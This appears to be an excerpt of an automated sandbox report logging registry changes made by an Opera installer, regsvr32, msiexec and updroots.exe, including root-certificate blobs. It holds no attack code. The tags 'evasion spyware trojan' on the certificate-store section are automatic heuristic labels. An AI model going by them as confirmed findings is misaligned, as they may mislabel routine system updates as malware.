Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\OperaStable\shell\open\ddeexec\Application C:\Program Files (x86)\Opera\79.0.4143.22\installer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8E3867A3-8586-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\ = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib\ = "{FF9EAEBA-7783-4904-99E3-F3E322C0F648}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{DF20F518-8ED1-35E3-950E-020214FDB9B2}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\URTTEMP\regtlib.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2BEC8FA8-1193-4A15-B8AF-C6DF6E6930C7}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20DD1B9D-87C4-11D1-8BE3-0000F8754DA1}\ = "DDTPickerEvents" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDE57A43-8B86-11D0-B3C6-00A0C90AEA82}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{894BA3A3-3CA3-402F-B4FE-CD08337E9535}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5CD861E8-CA91-301B-9E24-141E3D85BD5D} C:\Windows\SysWOW64\URTTEMP\regtlib.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ComCtl2.UpDown.1\CLSID\ = "{2BEC8FA8-1193-4A15-B8AF-C6DF6E6930C7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F0D2F21C-CCB0-11D0-A316-00AA00688B10} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C932BA85-4374-101B-A56C-00AA003668DC}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{8990CB3B-227E-3A43-8264-0057EC763FA0}\1.0.5000.0\Class = "System.Security.Cryptography.CryptoStreamMode" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Windows|Microsoft.NET|Framework|v1.1.4322|mscorwks.dll\System.Data,Version="1.0.5000.0",PublicKeyToken="b77a5c561934e089",Culture="neutral",FileVersion="1.1.4322.573" = 250045006d0041006a003f00430025006b0039005700370063004e0042005f002e005b0074005b005200650064006900730074005f005000610063006b006100670065003e003d003600780045006d0051007d00620024003f005b006b0044005000410074002a002b004d00760000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{612A8625-0FB3-11CE-8747-524153480004}\ = "IToolbar10" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.aspx\PersistentHandler\ = "{eec97550-47a9-11cf-b952-00aa0051fe20}" C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_regiis.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global\System.Configuration.Install,Version="1.0.5000.0",PublicKeyToken="b03f5f7f11d50a3a",Culture="neutral",FileVersion="1.1.4322.573" = 250045006d0041006a003f00430025006b0039005700370063004e0042005f002e005b0074005b005200650064006900730074005f005000610063006b006100670065003e004e004c006300260029007b0044003f0029004100240031007300550058003f003200350073004f0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\OperaStable\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Opera Installer\opera_installer_20240503165131\installer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E953-850A-101B-AFC0-4210102A8DA7} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9181DC5F-E07D-418A-ACA6-8EEA1ECB8E9E}\VersionIndependentProgID\ = "MSComctlLib.TreeCtrl" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F91CAF91-225B-43A7-BB9E-472F991FC402}\ = "Microsoft ImageList Control 6.0 (SP6)" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F0D2F211-CCB0-11D0-A316-00AA00688B10}\1.0\ = "Microsoft DataList Controls 6.0 (SP6) (OLEDB)" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Record\{CFBE2DE7-4D99-3449-AF78-0C915176ECAD}\1.0.5000.0 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{58DA8D8A-9D6A-101B-AFC0-4210102A8DA7} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FE38753A-44A3-11D1-B5B7-0000C09000C4}\ToolboxBitmap32\ = "C:\\Windows\\SysWow64\\mscomct2.ocx, 10" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2CE46480-1A08-11CF-AD63-00AA00614F3E}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{CE588EA7-1D88-3A0E-A0F4-DC22B14D2406}\1.0.5000.0\Assembly = "mscorcfg, Version=1.0.5000.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{C71DCE2B-B87F-37A9-89ED-F1145955BCD6}\1.0.5000.0\Class = "System.Runtime.InteropServices.HandleRef" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSComCtl2.MonthView.2 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F0D2F21B-CCB0-11D0-A316-00AA00688B10}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock.1\CLSID\ = "{6E5311A1-325D-4FFD-9AF4-B373F02AE458}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F1F6A820-2355-11CF-9D53-00AA003C9CB6} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{942085FD-8AEE-465F-ADD7-5E7AA28F8C14}\ProgID\ = "TabDlg.SSTab.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1270E004-F895-42BE-8070-DF90D60CBB75}\InprocServer32\ThreadingModel = "Both" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5522DAF9-06D6-11D2-8D70-00A0C98B28E2}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2334D2B3-713E-11CF-8AE5-00AA00C00905}\TypeLib\Version = "1.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7EBDAAE0-8120-11CF-899F-00AA00688B10} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E44F7BD4-3AB1-4D55-9190-FC53343AD2D2}\MiscStatus\1\ = "131473" C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8F0F480A-4366-4737-8265-2AD6FDAC8C31} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{5C3B20A1-8D61-374C-9ED1-8770350A4505}\1.0.5000.0\Class = "System.EnterpriseServices.ActivationOption" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{25A3C2C9-8F6E-4140-BEF3-535D4B9709D8}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6B7E6392-850A-101B-AFC0-4210102A8DA7} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E8A-DF38-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E6E17E88-DF38-11CF-8E74-00A0C90F26F8}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DA8D8C-9D6A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8556BCD0-E01E-11CF-8E74-00A0C90F26F8} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6E5311A1-325D-4FFD-9AF4-B373F02AE458}\Implemented Categories C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}\5.0\9\win32\ = "C:\\Windows\\SysWow64\\msvbvm50.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E6E17E84-DF38-11CF-8E74-00A0C90F26F8}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9F6AA700-D188-11CD-AD48-00AA003C9CB6}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C1A8AF27-1257-101B-8FB0-0020AF039CA3}\ = "DmciEvents" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{27395F88-0C0C-101B-A3C9-08002B2F49FB}\1.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{CE588EA7-1D88-3A0E-A0F4-DC22B14D2406}\1.0.5000.0 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4D6CC9A0-DF77-11CF-8E74-00A0C90F26F8}\TypeLib\ = "{C932BA88-4374-101B-A56C-00AA003668DC}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{65d822a4-4799-42c6-9b18-d26cf66dd320}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.Slider.1\ = "Microsoft Slider Control, version 5.0 (SP2)" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DA8D8B-9D6A-101B-AFC0-4210102A8DA7}\TypeLib\Version = "1.4" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{09194002-DF6E-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F08DF952-8592-11D1-B16A-00C0F0283628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0713E8C4-850A-101B-AFC0-4210102A8DA7}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.nex C:\Users\Admin\AppData\Local\Temp\Opera Installer\opera_installer_20240503165131\installer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{38911D8F-E448-11D0-84A3-00DD01104159}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E6E17E80-DF38-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\99A69BE61AFE886B4D2B82007CB854FC317E1539 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4313BB96F1D5869BC14E6A92F6CFF63469878237 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\61EF43D77FCAD46151BC98E0C35912AF9FEB6311 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\216B2A29E62A00CE820146D8244141B92511B279 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97226AAE4A7A64A59BD16787F27F841C0A001FD0\Blob = 0b000000010000001e000000430043004100200049006e00640069006100200032003000300037000000090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030703000000010000001400000097226aae4a7a64a59bd16787f27f841c0a001fd0200000000100000027030000308203233082020ba00302010202022780300d06092a864886f70d0101050500303a310b300906035504061302494e31123010060355040a1309496e64696120504b49311730150603550403130e43434120496e6469612032303037301e170d3037303631333037303234385a170d3135303730343037303234385a303a310b300906035504061302494e31123010060355040a1309496e64696120504b49311730150603550403130e43434120496e646961203230303730820122300d06092a864886f70d01010105000382010f003082010a0282010100df8fc7ca4a9cd247e28e32829e51e9080977fcb77e277b4e5d6bf8886fe80be3c0369b80e9e530b054f7a630fe376a584bd4785f549eb13e793d0f1357e246953a1d5c613582edf5c3b4b05268a8f8062b9e514bc25805f4cb9967ac9a212d39d0f8cf98889b1f7df5b1b6c043508383adabfdd6d6fafcf50fc64da74a05959eb85a5931540db8c9bc3742923b03d3f43adc2f4df82e4619ad071a256b6355e6f65dcd46db954995b9678d44eec9f86dca8cc90d9af62e67df7993c74238642ac75139a40596dbbea5080fd410b5efc1c78a0cd2d29cffc931e551590d2b40e28927f695dbb1e4a12bd0b54344d8de9f96da99ad9ad87cdc2390b40526d28ced0203010001a3333031300f0603551d130101ff040530030101ff30110603551d0e040a04084f1ec05827d8b8e4300b0603551d0f040403020106300d06092a864886f70d0101050500038201010072864f4882e8c5f0d9b8b0473319efcb0681a8b6ac87c3b94995922a8158d72b8ea2b827a04c13509d1cb5714c625188960c72ff0b60c435e1f8256eb9c1e1a7563afe86e34dc0abdad42a709bad5a9dd825d1ba85dfc21beb34d608770330647fd6f611098dad7e9e797f9b9ba39444e074b7b789caec045f8bcfe2ebe346db36f79d31ae8674a99deddc704fd3335c308620ae32c12c8f2734b6775e001a928abe88d9385bd4c35ab80f9324d62aae304841f66325cf4d87299eb3abf4f4ac4784592acffdedaf940d5000273373ee77e6e349b8a74c26c1ce916a17b2d241b5a99addd84dd5e310b5d23dc5f4d10cddbcac97d29758e85816059ac6adbd6a C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\89DF74FE5CF40F4A80F9E3377D54DA91E101318E\Blob = 03000000010000001400000089df74fe5cf40f4a80f9e3377d54da91e101318e090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b060105050703070b000000010000003e0000004d006900630072006f00530065006300200065002d0053007a00690067006e006f00200052006f006f00740020004300410020003200300030003900000020000000010000000e0400003082040a308202f2a003020102020900c27e43044e473f19300d06092a864886f70d01010b0500308182310b30090603550406130248553111300f06035504070c08427564617065737431163014060355040a0c0d4d6963726f736563204c74642e3127302506035504030c1e4d6963726f73656320652d537a69676e6f20526f6f742043412032303039311f301d06092a864886f70d0109011610696e666f40652d737a69676e6f2e6875301e170d3039303631363131333031385a170d3239313233303131333031385a308182310b30090603550406130248553111300f06035504070c08427564617065737431163014060355040a0c0d4d6963726f736563204c74642e3127302506035504030c1e4d6963726f73656320652d537a69676e6f20526f6f742043412032303039311f301d06092a864886f70d0109011610696e666f40652d737a69676e6f2e687530820122300d06092a864886f70d01010105000382010f003082010a0282010100e9f88ff363adda86d8a7e042fbcf91dea626f899a56370ad9baeca33407d6d966ea10e44eee1139d9442529abd7585742ca80e1d93b618b78c2ca8cffb5c71b9daecfee87e8fe42f1db2a87587d8b7a1e53bcf994a46d083197dc0a1121c956d4af4d8c7a54d332e853940757e147c80129850c74167b8a0806154a66c4e1fe09d0e07e9c9ba33e7fec055282c0280a719f59edc555303977b0748ff99fb378a24c459cc5010638eaaa91ab0841a86f95fbbb1506ea4d10accd5717e1fa71b7cf5536e225fcb2be6d47c5daed6c2c64ce50501d9ed57fcc12379fcfac8248395f3b56a5101d077d6e912a1f91a83fb821bb9b097f47606334349a0ff0bb5fab50203010001a38180307e300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414cb0fc6df4243cc3dcbb54823a11a7aa62abb3468301f0603551d23041830168014cb0fc6df4243cc3dcbb54823a11a7aa62abb3468301b0603551d11041430128110696e666f40652d737a69676e6f2e6875300d06092a864886f70d01010b05000382010100c9d10e5e2ed5ccb37c3ecbfc3dff0d28959304c8bfdacd79b84390f0a4beeff2ef2198bcd4d45d06f6ee42ec306ca0aaa9caf1af8afa3f0b736a3eea2e407e1fae546179eb2e0837d723f38c9fbe1db1e1a475dba0e25414b1ba1c29a418f612baa21414e33135c840ffb7e0057657c11c59f2f8bfe4ed25625c84f07e7e1fb3bef9b72111cc03015670a710921e1b34811ead9c1ac3043ced0261d61e06f35f3a87f22bf14587e53dacd1c75784bd6baedcd8f9b61b62700b3d36c942f232d77a61e6d2db3dcfc8a9c99bdcdb5844d76f38af7f78d3a3ad1a75ba1cc1367c8f1e6d1cc37546ae3505a6f65c3d21ee56f0c982222d7a54ab70c37d2265827096 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0446C8BB9A6983C95C8A2E5464687C1115AAB74A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\90DECE77F8C825340E62EBD635E1BE20CF7327DD\Blob = 03000000010000001400000090dece77f8c825340e62ebd635e1be20cf7327dd090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070308060a2b0601040182370a030406082b0601050507030606082b060105050703070b000000010000005000000049002e00430041002000132020005300740061006e0064006100720064002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000020000000010000002e0400003082042a30820312a003020102020316e360300d06092a864886f70d01010b05003081ab310b300906035504061302435a3139303706035504030c30492e4341202d205374616e646172642043657274696669636174696f6e20417574686f726974792c2030392f32303039312d302b060355040a0c245072766ec3ad20636572746966696b61c48d6ec3ad206175746f726974612c20612e732e31323030060355040b0c29492e4341202d2050726f7669646572206f662043657274696669636174696f6e205365727669636573301e170d3039303930313030303030305a170d3139303930313030303030305a3081ab310b300906035504061302435a3139303706035504030c30492e4341202d205374616e646172642043657274696669636174696f6e20417574686f726974792c2030392f32303039312d302b060355040a0c245072766ec3ad20636572746966696b61c48d6ec3ad206175746f726974612c20612e732e31323030060355040b0c29492e4341202d2050726f7669646572206f662043657274696669636174696f6e20536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100a80856123ffb9483a96076bd45837e96343ccf494ed6cffc20e1e1b102146dadca7e507229a9fd9c77263864f743413f148204a2419002e799f78362784485e89d0570d4fe78a17434c7ac3b8502ddee515b463b5333d667ecec142ee3c4e5b3748300ccc696e61c83dadc185069fadd43d18e40fd16a4b78c6587e0beac971fb071eb00655716ce6c87af9788f05df7874d3a110aa2c24414c016f24ff5db9542af29b329a083516efe3c515793302526ba3b6a86c8f60bd1713f9cb73ac8ce67098cfa401b7a6cdec81ca0c65cbb6118883f2e591d56fc7a459ca6d938d9c560ccb94155b7cabc4deeb4a7c4f6a00ebc89c50195b15cdf4ff0ccc2cd42bb5f0203010001a3553053300f0603551d130101ff040530030101ff300e0603551d0f0101ff04040302010630110603551d20040a300830060604551d2000301d0603551d0e04160414c14c3894d5808648d922902cd3ee1910db674787300d06092a864886f70d01010b05000382010100a3cbd17d74fb35780792e8ee68e9e4525ef0d86391949f68fbbe5bbaa9e16377ab5076c6e95647545099b4258be8c11972365a09bee7d6fac2b6323d47c3504e996e9336c58a517763e04933ab3c1f8ae93bd986b528c7c275715b666a8d580ef37590b5ad2c8118cd9cd8c3cd4ff1fb692097c048cf134512b51cf63e83e24e5edd59c66b4ae048ced92a9d653abd2ff0f04cbc097acb3700a43f3b0c23dde3fbc642a2b4b6e6d272854cdfb3de16a77e1de7d4cfadabb350e4708cdfb07090c9869eee7c848b641c6be168157ec9a574e04ef75aeadd1231ab914085710bce2928f96e38145c1dfeec11bf4d437e9e5f38bfd7ea9e932fd01d74b50509d322 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\786A74AC76AB147F9C6A3050BA9EA87EFE9ACE3C\Blob = 030000000100000014000000786a74ac76ab147f9c6a3050ba9ea87efe9ace3c090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b060105050703070b00000001000000420000004300680061006d00620065007200730020006f006600200043006f006d006d006500720063006500200052006f006f00740020002d0020003200300030003800000053000000010000002700000030253023060d2b0601040181872e0a0e02010230123010060a2b0601040182373c0101030200c02000000001000000530700003082074f30820537a003020102020900a3da427ea4b1aeda300d06092a864886f70d01010505003081ae310b3009060355040613024555314330410603550407133a4d616472696420287365652063757272656e742061646472657373206174207777772e63616d65726669726d612e636f6d2f61646472657373293112301006035504051309413832373433323837311b3019060355040a131241432043616d65726669726d6120532e412e31293027060355040313204368616d62657273206f6620436f6d6d6572636520526f6f74202d2032303038301e170d3038303830313132323935305a170d3338303733313132323935305a3081ae310b3009060355040613024555314330410603550407133a4d616472696420287365652063757272656e742061646472657373206174207777772e63616d65726669726d612e636f6d2f61646472657373293112301006035504051309413832373433323837311b3019060355040a131241432043616d65726669726d6120532e412e31293027060355040313204368616d62657273206f6620436f6d6d6572636520526f6f74202d203230303830820222300d06092a864886f70d01010105000382020f003082020a0282020100af00cb70372b805a4a3a6c78947da37f1a1ff635d5bddbcb0d44723e26b29052ba633b28586fa5b36d94a6f3dd640c55f6f6e7f22222805ee162c6b629e1816cf2bfe57d326a54a0321959fe1f8bd73d608685246fe311b3773e209635216bb308d9702e64f7849253d60eb0908a8ae3878d06d3bd900ee299a11b860eda9a0abb0b61500652f19e7f76eccb0fd01e0dcf99303d1cc4451058acd6d3e8d7e5eac5010777d651e6037f8a48a54d6875b9e9bc9e4e1971f5324b9c6d60190bfbcc9d75dcbf26cd8f93783979735e250eca5ceb771207cb6441477293ab50c3eb09766434d239b77611090d7645c4a9ae3d6aafb57d652f945810ec5c7caf7ee2b618d9d09b4e5a49dfa9660bcc3cc6787ca79c1de3ce8e53be05de600f6be51adb3fe3e121c929c1f1eb079c521b0144513c7b25d7c4e552545d2507ca1620b8ade441ee7a08fe996f83a69102b06c36556ae77df596e6ca81d697f19483e9edb0b16b12691eacfb5da9c598e9b45b587abe3da2443a6359d40b25de1b4fbde5019ecdd229d59f17190a6fbf0c90d3095fd9e38a35cc795a4d193792b7c4c1adaff479249ab2010bb1af5c96f38032fb5c3d98f1a03f4adebeaf942ed9559a176e609d636cb863c9ae815c1835e090bbbe3c4f3722b97eebcf9e7721a63d3881fb48da313d2be389f5d0b5bd7ee050c41289b3239a103185dbae6fef38331876110203010001a382016c3082016830120603551d130101ff040830060101ff02010c301d0603551d0e04160414f924ac0fb2b5f879c0fa60881bc4d94d029e17193081e30603551d230481db3081d88014f924ac0fb2b5f879c0fa60881bc4d94d029e1719a181b4a481b13081ae310b3009060355040613024555314330410603550407133a4d616472696420287365652063757272656e742061646472657373206174207777772e63616d65726669726d612e636f6d2f61646472657373293112301006035504051309413832373433323837311b3019060355040a131241432043616d65726669726d6120532e412e31293027060355040313204368616d62657273206f6620436f6d6d6572636520526f6f74202d2032303038820900a3da427ea4b1aeda300e0603551d0f0101ff040403020106303d0603551d200436303430320604551d2000302a302806082b06010505070201161c687474703a2f2f706f6c6963792e63616d65726669726d612e636f6d300d06092a864886f70d010105050003820201009012af2235c2a339f02edee9b5e9787c48be3f7d45925ee9dab119fc163c9fb45b669e6ae7c3b95d88e80fadcf230fde253a5ecc4fa5c1b52dac24d25807dea2cf69846033e8100d13a923d085e58e7ba69e3d72137233f5aa7dc6631f08f4fe017f24cf2b2c5409dee22b6d92c6394f16ea3c7e7a46d4456a46a8eb758256a7aba07c681333f69d30f06f273924232a90fd902935f293df34a5c6f7f8ef8c0f624a7caed3f554f88db69a568716823a33ab5a2208f782baea2ee0479ab4b545a3053bd9dc2e45403beadc7fe83bebd1ec26d835a430c53aac579eb376a5207bf91e4a056201a628756097920d6e3e4d37430d92159c1822cd5199a0291a3c5f8a32335b